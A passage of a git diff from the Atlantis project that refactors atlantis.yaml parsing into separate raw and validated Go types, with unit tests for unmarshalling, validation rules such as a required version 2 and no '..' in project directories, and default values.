-// { -// description: "project with no config", -// input: ` -//version: 2 -//projects: -//-`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project without dir set", -// input: ` -//version: 2 -//projects: -//- workspace: "staging"`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with dir set to empty string", -// input: ` -//version: 2 -//projects: -//- dir: ""`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with no config at index 1", -// input: ` -//version: 2 -//projects: -//- dir: "." -//-`, -// expErr: "project at index 1 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with unknown key", -// input: ` -//version: 2 -//projects: -//- unknown: value`, -// expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) -// }) -// } -//} -// -//func TestReadConfig_Successes(t *testing.T) { -// basicProjects := []yaml.Project{ -// { -// AutoPlan: &yaml.AutoPlan{ -// Enabled: true, -// WhenModified: []string{"**/*.tf"}, -// }, -// Workspace: "default", -// TerraformVersion: "", -// ApplyRequirements: nil, -// Workflow: "", -// Dir: ".", -// }, -// } -// -// cases := []struct { -// description string -// input string -// expOutput yaml.Spec -// }{ -// { -// description: "uses project defaults", -// input: ` -//version: 2 -//projects: -//- dir: "."`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// 
}, -// { -// description: "autoplan is enabled by default", -// input: ` -//version: 2 -//projects: -//- dir: "." -// auto_plan: -// when_modified: ["**/*.tf"] -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if workflows not defined, there are none", -// input: ` -//version: 2 -//projects: -//- dir: "." -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if workflows key set but with no workflows there are none", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: ~ -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if a workflow is defined but set to null we use the defaults", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: ~ -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if a plan or apply has no steps defined then we use the defaults", -// input: ` -//version: 2 -//projects: -//- dir: "." 
-//workflows: -// default: -// plan: -// apply: -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if a plan or apply explicitly defines an empty steps key then there are no steps", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// apply: -// steps: -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: nil, -// }, -// Apply: &yaml.Stage{ -// Steps: nil, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if steps are set then we parse them properly", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// - init -// - plan -// apply: -// steps: -// - plan # we don't validate if they make sense -// - apply -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "plan", -// }, -// { -// StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "we parse extra_args for the steps", -// input: ` -//version: 2 -//projects: -//- dir: "." 
-//workflows: -// default: -// plan: -// steps: -// - init: -// extra_args: [] -// - plan: -// extra_args: -// - arg1 -// - arg2 -// apply: -// steps: -// - plan: -// extra_args: [a, b] -// - apply: -// extra_args: ["a", "b"] -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// ExtraArgs: []string{}, -// }, -// { -// StepType: "plan", -// ExtraArgs: []string{"arg1", "arg2"}, -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "plan", -// ExtraArgs: []string{"a", "b"}, -// }, -// { -// StepType: "apply", -// ExtraArgs: []string{"a", "b"}, -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "custom steps are parsed", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// steps: -// - run: "echo \"plan hi\"" -// apply: -// steps: -// - run: echo apply "arg 2" -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "run", -// Run: []string{"echo", "plan hi"}, -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "run", -// Run: []string{"echo", "apply", "arg 2"}, -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// act, err := r.ReadConfig(tmpDir) -// Ok(t, err) -// Equals(t, c.expOutput, act) -// }) -// } -//} +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + 
"github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" +) + +func TestReadConfig_DirDoesNotExist(t *testing.T) { + r := yaml.ParserValidator{} + _, err := r.ReadConfig("/not/exist") + Assert(t, os.IsNotExist(err), "exp nil ptr") +} + +func TestReadConfig_FileDoesNotExist(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + + r := yaml.ParserValidator{} + _, err := r.ReadConfig(tmpDir) + Assert(t, os.IsNotExist(err), "exp nil ptr") +} + +func TestReadConfig_BadPermissions(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) + Ok(t, err) + + r := yaml.ParserValidator{} + _, err = r.ReadConfig(tmpDir) + ErrContains(t, "unable to read atlantis.yaml file: ", err) +} + +func TestReadConfig_UnmarshalErrors(t *testing.T) { + // We only have a few cases here because we assume the YAML library to be + // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. + cases := []struct { + description string + input string + expErr string + }{ + { + "random characters", + "slkjds", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into raw.Spec", + }, + { + "just a colon", + ":", + "parsing atlantis.yaml: yaml: did not find expected key", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + r := yaml.ParserValidator{} + _, err = r.ReadConfig(tmpDir) + ErrEquals(t, c.expErr, err) + }) + } +} + +func TestReadConfig(t *testing.T) { + cases := []struct { + description string + input string + expErr string + exp valid.Spec + }{ + // Version key. + { + description: "no version", + input: ` +projects: +- dir: "." 
+`, + expErr: "version: is required.", + }, + { + description: "unsupported version", + input: ` +version: 0 +projects: +- dir: "." +`, + expErr: "version: must equal 2.", + }, + { + description: "empty version", + input: ` +version: ~ +projects: +- dir: "." +`, + expErr: "version: must equal 2.", + }, + + // Projects key. + { + description: "empty projects list", + input: ` +version: 2 +projects:`, + exp: valid.Spec{ + Version: 2, + Projects: nil, + Workflows: map[string]valid.Workflow{}, + }, + }, + { + description: "project dir not set", + input: ` +version: 2 +projects: +- `, + expErr: "projects: (0: (dir: cannot be blank.).).", + }, + { + description: "project dir set", + input: ` +version: 2 +projects: +- dir: .`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "default", + Workflow: nil, + TerraformVersion: nil, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + Workflows: map[string]valid.Workflow{}, + }, + }, + { + description: "project fields set except autoplan", + input: ` +version: 2 +projects: +- dir: . + workspace: myworkspace + terraform_version: v0.11.0 + apply_requirements: [approved] + workflow: myworkflow +workflows: + myworkflow: ~`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + Workflows: map[string]valid.Workflow{ + "myworkflow": {}, + }, + }, + }, + { + description: "project field with autoplan", + input: ` +version: 2 +projects: +- dir: . 
+ workspace: myworkspace + terraform_version: v0.11.0 + apply_requirements: [approved] + workflow: myworkflow + autoplan: + enabled: false +workflows: + myworkflow: ~`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: false, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + Workflows: map[string]valid.Workflow{ + "myworkflow": {}, + }, + }, + }, + { + description: "project dir with ..", + input: ` +version: 2 +projects: +- dir: ..`, + expErr: "projects: (0: (dir: cannot contain '..'.).).", + }, + + // Project must have dir set. + { + description: "project with no config", + input: ` +version: 2 +projects: +-`, + expErr: "projects: (0: (dir: cannot be blank.).).", + }, + { + description: "project with no config at index 1", + input: ` +version: 2 +projects: +- dir: "." +-`, + expErr: "projects: (1: (dir: cannot be blank.).).", + }, + { + description: "project with unknown key", + input: ` +version: 2 +projects: +- unknown: value`, + expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct raw.Project", + }, + { + description: "referencing workflow that doesn't exist", + input: ` +version: 2 +projects: +- dir: . 
+ workflow: undefined`, + expErr: "workflow \"undefined\" is not defined", + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := yaml.ParserValidator{} + act, err := r.ReadConfig(tmpDir) + if c.expErr != "" { + ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, act) + }) + } +} + +func TestReadConfig_Successes(t *testing.T) { + basicProjects := []valid.Project{ + { + Autoplan: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + Workspace: "default", + ApplyRequirements: nil, + Dir: ".", + }, + } + + cases := []struct { + description string + input string + expOutput valid.Spec + }{ + { + description: "uses project defaults", + input: ` +version: 2 +projects: +- dir: "."`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "autoplan is enabled by default", + input: ` +version: 2 +projects: +- dir: "." + autoplan: + when_modified: ["**/*.tf"] +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if workflows not defined there are none", + input: ` +version: 2 +projects: +- dir: "." +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if workflows key set but with no workflows there are none", + input: ` +version: 2 +projects: +- dir: "." +workflows: ~ +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: make(map[string]valid.Workflow), + }, + }, + { + description: "if a plan or apply explicitly defines an empty steps key then there are no steps", + input: ` +version: 2 +projects: +- dir: "." 
+workflows: + default: + plan: + steps: + apply: + steps: +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: nil, + }, + Apply: &valid.Stage{ + Steps: nil, + }, + }, + }, + }, + }, + { + description: "if steps are set then we parse them properly", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init + - plan + apply: + steps: + - plan # we don't validate if they make sense + - apply +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + { + StepName: "plan", + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "plan", + }, + { + StepName: "apply", + }, + }, + }, + }, + }, + }, + }, + { + description: "we parse extra_args for the steps", + input: ` +version: 2 +projects: +- dir: "." +workflows: + default: + plan: + steps: + - init: + extra_args: [] + - plan: + extra_args: + - arg1 + - arg2 + apply: + steps: + - plan: + extra_args: [a, b] + - apply: + extra_args: ["a", "b"] +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + ExtraArgs: []string{}, + }, + { + StepName: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "plan", + ExtraArgs: []string{"a", "b"}, + }, + { + StepName: "apply", + ExtraArgs: []string{"a", "b"}, + }, + }, + }, + }, + }, + }, + }, + { + description: "custom steps are parsed", + input: ` +version: 2 +projects: +- dir: "." 
+workflows: + default: + plan: + steps: + - run: "echo \"plan hi\"" + apply: + steps: + - run: echo apply "arg 2" +`, + expOutput: valid.Spec{ + Version: 2, + Projects: basicProjects, + Workflows: map[string]valid.Workflow{ + "default": { + Plan: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "run", + RunCommand: []string{"echo", "plan hi"}, + }, + }, + }, + Apply: &valid.Stage{ + Steps: []valid.Step{ + { + StepName: "run", + RunCommand: []string{"echo", "apply", "arg 2"}, + }, + }, + }, + }, + }, + }, + }, + } + + tmpDir, cleanup := TempDir(t) + defer cleanup() + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) + Ok(t, err) + + r := yaml.ParserValidator{} + act, err := r.ReadConfig(tmpDir) + Ok(t, err) + Equals(t, c.expOutput, act) + }) + } +} + +// Bool is a helper routine that allocates a new bool value +// to store v and returns a pointer to it. +func Bool(v bool) *bool { return &v } + +// Int is a helper routine that allocates a new int value +// to store v and returns a pointer to it. +func Int(v int) *int { return &v } + +// String is a helper routine that allocates a new string value +// to store v and returns a pointer to it. 
+func String(v string) *string { return &v } diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go deleted file mode 100644 index d6d7e89e6d..0000000000 --- a/server/events/yaml/project.go +++ /dev/null @@ -1,10 +0,0 @@ -package yaml - -type Project struct { - Dir *string `yaml:"dir,omitempty"` - Workspace *string `yaml:"workspace,omitempty"` - Workflow *string `yaml:"workflow,omitempty"` - TerraformVersion *string `yaml:"terraform_version,omitempty"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements,omitempty"` -} diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go deleted file mode 100644 index 0827bee733..0000000000 --- a/server/events/yaml/project_test.go +++ /dev/null @@ -1,63 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestProject_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.Project - }{ - { - description: "omit unset fields", - input: "", - exp: yaml.Project{ - Dir: nil, - Workspace: nil, - Workflow: nil, - TerraformVersion: nil, - AutoPlan: nil, - ApplyRequirements: nil, - }, - }, - { - description: "all fields set", - input: ` -dir: mydir -workspace: workspace -workflow: workflow -terraform_version: v0.11.0 -auto_plan: - when_modified: [] - enabled: false -apply_requirements: -- mergeable`, - exp: yaml.Project{ - Dir: String("mydir"), - Workspace: String("workspace"), - Workflow: String("workflow"), - TerraformVersion: String("v0.11.0"), - AutoPlan: &yaml.AutoPlan{ - WhenModified: []string{}, - Enabled: Bool(false), - }, - ApplyRequirements: []string{"mergeable"}, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var p yaml.Project - err := yamlv2.UnmarshalStrict([]byte(c.input), &p) - Ok(t, err) - Equals(t, 
c.exp, p) - }) - } -} diff --git a/server/events/yaml/raw/autoplan.go b/server/events/yaml/raw/autoplan.go new file mode 100644 index 0000000000..00222d1631 --- /dev/null +++ b/server/events/yaml/raw/autoplan.go @@ -0,0 +1,39 @@ +package raw + +import "github.com/runatlantis/atlantis/server/events/yaml/valid" + +const DefaultAutoPlanWhenModified = "**/*.tf" +const DefaultAutoPlanEnabled = true + +type Autoplan struct { + WhenModified []string `yaml:"when_modified,omitempty"` + Enabled *bool `yaml:"enabled,omitempty"` +} + +func (a Autoplan) ToValid() valid.Autoplan { + var v valid.Autoplan + if a.WhenModified == nil { + v.WhenModified = []string{DefaultAutoPlanWhenModified} + } else { + v.WhenModified = a.WhenModified + } + + if a.Enabled == nil { + v.Enabled = true + } else { + v.Enabled = *a.Enabled + } + + return v +} + +func (a Autoplan) Validate() error { + return nil +} + +func DefaultAutoPlan() valid.Autoplan { + return valid.Autoplan{ + WhenModified: []string{DefaultAutoPlanWhenModified}, + Enabled: DefaultAutoPlanEnabled, + } +} diff --git a/server/events/yaml/raw/autoplan_test.go b/server/events/yaml/raw/autoplan_test.go new file mode 100644 index 0000000000..43b85a0143 --- /dev/null +++ b/server/events/yaml/raw/autoplan_test.go @@ -0,0 +1,151 @@ +package raw_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . 
"github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestAutoPlan_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Autoplan + }{ + { + description: "omit unset fields", + input: "", + exp: raw.Autoplan{ + Enabled: nil, + WhenModified: nil, + }, + }, + { + description: "all fields set", + input: ` +enabled: true +when_modified: ["something-else"] +`, + exp: raw.Autoplan{ + Enabled: Bool(true), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "enabled false", + input: ` +enabled: false +when_modified: ["something-else"] +`, + exp: raw.Autoplan{ + Enabled: Bool(false), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "modified elem empty", + input: ` +enabled: false +when_modified: +- +`, + exp: raw.Autoplan{ + Enabled: Bool(false), + WhenModified: []string{""}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var a raw.Autoplan + err := yaml.UnmarshalStrict([]byte(c.input), &a) + Ok(t, err) + Equals(t, c.exp, a) + }) + } +} + +func TestAutoplan_Validate(t *testing.T) { + cases := []struct { + description string + input raw.Autoplan + }{ + { + description: "nothing set", + input: raw.Autoplan{}, + }, + { + description: "when_modified empty", + input: raw.Autoplan{ + WhenModified: []string{}, + }, + }, + { + description: "enabled false", + input: raw.Autoplan{ + Enabled: Bool(false), + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Ok(t, c.input.Validate()) + }) + } +} + +func TestAutoplan_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Autoplan + exp valid.Autoplan + }{ + { + description: "nothing set", + input: raw.Autoplan{}, + exp: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + }, + { + description: "when modified empty", + input: raw.Autoplan{ + WhenModified: []string{}, + }, + exp: valid.Autoplan{ + Enabled: 
true, + WhenModified: []string{}, + }, + }, + { + description: "enabled false", + input: raw.Autoplan{ + Enabled: Bool(false), + }, + exp: valid.Autoplan{ + Enabled: false, + WhenModified: []string{"**/*.tf"}, + }, + }, + { + description: "enabled true", + input: raw.Autoplan{ + Enabled: Bool(true), + }, + exp: valid.Autoplan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go new file mode 100644 index 0000000000..be9ce1980b --- /dev/null +++ b/server/events/yaml/raw/project.go @@ -0,0 +1,70 @@ +package raw + +import ( + "errors" + "fmt" + "strings" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +const ( + DefaultWorkspace = "default" + ApprovedApplyRequirement = "approved" +) + +type Project struct { + Dir *string `yaml:"dir,omitempty"` + Workspace *string `yaml:"workspace,omitempty"` + Workflow *string `yaml:"workflow,omitempty"` + TerraformVersion *string `yaml:"terraform_version,omitempty"` + Autoplan *Autoplan `yaml:"autoplan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements,omitempty"` +} + +func (p Project) Validate() error { + hasDotDot := func(value interface{}) error { + if strings.Contains(*value.(*string), "..") { + return errors.New("cannot contain '..'") + } + return nil + } + validApplyReq := func(value interface{}) error { + reqs := value.([]string) + for _, r := range reqs { + if r != ApprovedApplyRequirement { + return fmt.Errorf("%q not supported, only %s is supported", r, ApprovedApplyRequirement) + } + } + return nil + } + return validation.ValidateStruct(&p, + validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), + validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)), + ) +} + +func (p Project) ToValid() 
valid.Project { + var v valid.Project + v.Dir = *p.Dir + + if p.Workspace == nil { + v.Workspace = DefaultWorkspace + } else { + v.Workspace = *p.Workspace + } + + v.Workflow = p.Workflow + v.TerraformVersion = p.TerraformVersion + if p.Autoplan == nil { + v.Autoplan = DefaultAutoPlan() + } else { + v.Autoplan = p.Autoplan.ToValid() + } + + // There are no default apply requirements. + v.ApplyRequirements = p.ApplyRequirements + + return v +} diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go new file mode 100644 index 0000000000..9c06914896 --- /dev/null +++ b/server/events/yaml/raw/project_test.go @@ -0,0 +1,178 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . "github.com/runatlantis/atlantis/testing" + "gopkg.in/yaml.v2" +) + +func TestProject_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp raw.Project + }{ + { + description: "omit unset fields", + input: "", + exp: raw.Project{ + Dir: nil, + Workspace: nil, + Workflow: nil, + TerraformVersion: nil, + Autoplan: nil, + ApplyRequirements: nil, + }, + }, + { + description: "all fields set", + input: ` +dir: mydir +workspace: workspace +workflow: workflow +terraform_version: v0.11.0 +autoplan: + when_modified: [] + enabled: false +apply_requirements: +- mergeable`, + exp: raw.Project{ + Dir: String("mydir"), + Workspace: String("workspace"), + Workflow: String("workflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"mergeable"}, + }, + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var p raw.Project + err := yaml.UnmarshalStrict([]byte(c.input), &p) + Ok(t, err) + Equals(t, c.exp, p) + }) + } +} + +func TestProject_Validate(t 
*testing.T) { + cases := []struct { + description string + input raw.Project + expErr string + }{ + { + description: "minimal fields", + input: raw.Project{ + Dir: String("."), + }, + expErr: "", + }, + { + description: "dir empty", + input: raw.Project{ + Dir: nil, + }, + expErr: "dir: cannot be blank.", + }, + { + description: "dir with ..", + input: raw.Project{ + Dir: String("../mydir"), + }, + expErr: "dir: cannot contain '..'.", + }, + { + description: "apply reqs with unsupported", + input: raw.Project{ + Dir: String("."), + ApplyRequirements: []string{"unsupported"}, + }, + expErr: "apply_requirements: \"unsupported\" not supported, only approved is supported.", + }, + { + description: "apply reqs with valid", + input: raw.Project{ + Dir: String("."), + ApplyRequirements: []string{"approved"}, + }, + expErr: "", + }, + } + validation.ErrorTag = "yaml" + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + err := c.input.Validate() + if c.expErr == "" { + Ok(t, err) + } else { + ErrEquals(t, c.expErr, err) + } + }) + } +} + +func TestProject_ToValid(t *testing.T) { + cases := []struct { + description string + input raw.Project + exp valid.Project + }{ + { + description: "minimal values", + input: raw.Project{ + Dir: String("."), + }, + exp: valid.Project{ + Dir: ".", + Workspace: "default", + Workflow: nil, + TerraformVersion: nil, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + ApplyRequirements: nil, + }, + }, + { + description: "all set", + input: raw.Project{ + Dir: String("."), + Workspace: String("myworkspace"), + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: &raw.Autoplan{ + WhenModified: []string{"hi"}, + Enabled: Bool(false), + }, + ApplyRequirements: []string{"approved"}, + }, + exp: valid.Project{ + Dir: ".", + Workspace: "myworkspace", + Workflow: String("myworkflow"), + TerraformVersion: String("v0.11.0"), + Autoplan: valid.Autoplan{ + WhenModified: 
[]string{"hi"}, + Enabled: false, + }, + ApplyRequirements: []string{"approved"}, + }, + }, + } + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + Equals(t, c.exp, c.input.ToValid()) + }) + } +} diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go new file mode 100644 index 0000000000..0d93ef71c4 --- /dev/null +++ b/server/events/yaml/raw/raw.go @@ -0,0 +1,4 @@ +// Package raw contains the golang representations of the YAML elements +// supported in atlantis.yaml. It is called raw because no validation has +// been done yet at this stage. +package raw diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/raw/raw_test.go similarity index 95% rename from server/events/yaml/yaml_test.go rename to server/events/yaml/raw/raw_test.go index c82dd3486b..e0f43fac6d 100644 --- a/server/events/yaml/yaml_test.go +++ b/server/events/yaml/raw/raw_test.go @@ -1,4 +1,4 @@ -package yaml_test +package raw_test // Bool is a helper routine that allocates a new bool value // to store v and returns a pointer to it. 
diff --git a/server/events/yaml/raw/spec.go b/server/events/yaml/raw/spec.go new file mode 100644 index 0000000000..aaebc05f33 --- /dev/null +++ b/server/events/yaml/raw/spec.go @@ -0,0 +1,45 @@ +package raw + +import ( + "errors" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +type Spec struct { + Version *int `yaml:"version,omitempty"` + Projects []Project `yaml:"projects,omitempty"` + Workflows map[string]Workflow `yaml:"workflows,omitempty"` +} + +func (s Spec) Validate() error { + equals2 := func(value interface{}) error { + if *value.(*int) != 2 { + return errors.New("must equal 2") + } + return nil + } + return validation.ValidateStruct(&s, + validation.Field(&s.Version, validation.NotNil, validation.By(equals2)), + validation.Field(&s.Projects), + validation.Field(&s.Workflows), + ) +} + +func (s Spec) ToValid() valid.Spec { + var validProjects []valid.Project + for _, p := range s.Projects { + validProjects = append(validProjects, p.ToValid()) + } + + validWorkflows := make(map[string]valid.Workflow) + for k, v := range s.Workflows { + validWorkflows[k] = v.ToValid() + } + return valid.Spec{ + Version: *s.Version, + Projects: validProjects, + Workflows: validWorkflows, + } +} diff --git a/server/events/yaml/raw/spec_test.go b/server/events/yaml/raw/spec_test.go new file mode 100644 index 0000000000..d7b83e53de --- /dev/null +++ b/server/events/yaml/raw/spec_test.go @@ -0,0 +1,268 @@ +package raw_test + +import ( + "testing" + + "github.com/go-ozzo/ozzo-validation" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + . 
